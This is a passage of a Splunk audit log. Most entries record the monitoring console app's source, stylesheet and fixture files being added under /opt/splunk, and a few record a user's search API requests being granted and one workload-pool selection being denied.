mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.339, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages/monitoringconsole_check_list.js", isdir=0, size=277, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.334, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages/monitoringconsole_check.js", isdir=0, size=261, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.327, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages/monitoringconsole_alerts_setup.js", isdir=0, size=286, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.319, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/mixins/DistributedSearchGroup.js", isdir=0, size=17792, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.314, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/splunk_tcpin_performance_extension.css", isdir=0, size=112, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.309, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/splunk_data_pipeline.png", isdir=0, size=52315, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.303, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/shared.css", isdir=0, size=189, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.299, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/overview_alerts_extension.css", isdir=0, size=220, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.292, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/indexing_performance_instance_extension.css", isdir=0, size=1030, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.285, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/indexer_clustering_status_extension.css", isdir=0, size=1140, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.278, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/index_type.css", isdir=0, size=81, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.272, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/http_event_collector.css", isdir=0, size=620, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.268, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/health-check.css", isdir=0, size=232, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.262, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/forwarder_monitoring_extension.css", isdir=0, size=54, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.256, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/dashboard.css", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.250, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static/README", isdir=0, size=261, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.043, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/variables.pcss", isdir=0, size=30435, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.037, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/variables.lite.pcss", isdir=0, size=26, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.031, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/variables.enterprise.pcss", isdir=0, size=26, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.024, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/variables.dark.pcss", isdir=0, size=17791, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.015, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/utilities.pcss", isdir=0, size=977, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.008, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/type.pcss", isdir=0, size=7275, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.001, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/tour.pcss", isdir=0, size=15563, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.993, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/tooltip.pcss", isdir=0, size=2068, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.985, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/thumbnails.pcss", isdir=0, size=1442, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.980, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/tables.pcss", isdir=0, size=20618, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.973, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/table-captions.pcss", isdir=0, size=2072, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.965, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/sprites.pcss", isdir=0, size=13443, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.958, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/shoestrap.pcss", isdir=0, size=226, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.952, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/scaffolding.pcss", isdir=0, size=10430, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.943, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/reset.pcss", isdir=0, size=4428, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.938, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/progress-bars.pcss", isdir=0, size=3855, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.933, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/popdowns.pcss", isdir=0, size=1481, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.928, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/pagination.pcss", isdir=0, size=3490, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.924, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/pager.pcss", isdir=0, size=1127, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.918, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/navs.pcss", isdir=0, size=14754, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.913, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/navs-app.pcss", isdir=0, size=7891, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.908, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/navbar.pcss", isdir=0, size=12034, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.903, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/navbar-splunkbar.pcss", isdir=0, size=8753, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.895, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/navbar-messages.pcss", isdir=0, size=2549, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.889, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/navbar-mega-menu.pcss", isdir=0, size=5661, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.884, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/navbar-footer.pcss", isdir=0, size=2987, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.875, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/navbar-appbar.pcss", isdir=0, size=2751, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.869, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/modals.pcss", isdir=0, size=7362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.863, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/mixins.pcss", isdir=0, size=28480, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.856, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/mixins-grid.pcss", isdir=0, size=5967, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.850, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/layouts.pcss", isdir=0, size=584, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.845, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/labels-badges.pcss", isdir=0, size=3289, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.838, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/jquery.pcss", isdir=0, size=6530, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.829, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/grid.pcss", isdir=0, size=595, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.824, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/forms.pcss", isdir=0, size=35269, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.818, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/fonts.pcss", isdir=0, size=924, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.814, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/dropdowns.pcss", isdir=0, size=12710, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.809, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/component-animations.pcss", isdir=0, size=555, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.805, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/color-palette.pcss", isdir=0, size=8883, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.801, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/code.pcss", isdir=0, size=1517, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.795, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/close.pcss", isdir=0, size=1473, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.790, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/carousel.pcss", isdir=0, size=3669, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.785, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/buttons.pcss", isdir=0, size=7298, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.779, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/button-groups.pcss", isdir=0, size=12021, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.773, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/brand.pcss", isdir=0, size=1338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.767, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/brand.lite.pcss", isdir=0, size=446, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.761, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/brand.enterprise.pcss", isdir=0, size=512, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.755, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/brand.dark.pcss", isdir=0, size=512, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.749, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/bootstrap.pcss", isdir=0, size=1200, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.742, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/alerts.pcss", isdir=0, size=2200, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.736, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base/accordion.pcss", isdir=0, size=3557, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.360, user=user, action=search, info=granted REST: /search/jobs/1665078120.4/summary] Audit:[timestamp=10-06-2022 17:42:01.358, user=user, action=search, info=granted REST: /search/jobs/1665078120.4/events] Audit:[timestamp=10-06-2022 17:42:01.326, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/select2.pcss", isdir=0, size=8839, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.321, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss/base", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:01.316, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/fixtures/Tasks.json", isdir=0, size=61617, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.312, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/fixtures/Metrics.json", isdir=0, size=23087, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.308, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/fixtures/Bookmarks.json", isdir=0, size=4293, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.217, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:42:01.201, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/helpers/user_agent.js", isdir=0, size=3879, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.197, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/helpers/ThresholdConfigsClient.js", isdir=0, size=5681, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.191, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/helpers/Formatters.js", isdir=0, size=2282, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.185, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/pcss/icon-style.pcss", isdir=0, size=563, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.180, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/utils.js", isdir=0, size=2784, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.169, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/pcss", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:01.160, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Tasks.pcss", isdir=0, size=139, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.156, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Tasks.js", isdir=0, size=3263, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.152, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Tasks.html", isdir=0, size=835, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.146, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/TaskInfo.pcss", isdir=0, size=157, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.140, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/TaskInfo.js", isdir=0, size=3150, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.136, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/TaskInfo.html", isdir=0, size=1085, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.130, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Task.js", isdir=0, size=1988, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.124, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Task.html", isdir=0, size=311, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.104, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Sidebar.pcss", isdir=0, size=219, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.098, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Sidebar.js", isdir=0, size=1962, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.093, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Sidebar.html", isdir=0, size=220, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.088, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Scope.pcss.js", isdir=0, size=38927, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.082, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Scope.pcss", isdir=0, size=428, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.078, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Scope.js", isdir=0, size=9881, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.076, user=user, action=select_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:42:01.075, user=user, action=search, info=granted REST: /search/jobs/1665078120.4] Audit:[timestamp=10-06-2022 17:42:01.074, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Results.pcss", isdir=0, size=543, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.070, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Results.js", isdir=0, size=3636, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.066, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Results.html", isdir=0, size=1493, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.061, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/ReasonCountStandalone.pcss", isdir=0, size=141, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.056, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/ReasonCountStandalone.js", isdir=0, size=1637, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.052, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/ReasonCountStandalone.html", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.048, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/ReasonCountDistributed.pcss", isdir=0, size=150, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.041, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/ReasonCountDistributed.js", isdir=0, size=4012, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.035, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/ReasonCountDistributed.html", isdir=0, size=651, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.029, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/ProgressBar.pcss", isdir=0, size=146, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.023, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/ProgressBar.js", isdir=0, size=1122, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.019, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/ProgressBar.html", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.011, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Master.pcss", isdir=0, size=962, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.005, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Master.js", isdir=0, size=7530, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:01.000, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Master.html", isdir=0, size=836, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.994, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/InfoDialog.pcss", isdir=0, size=271, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] 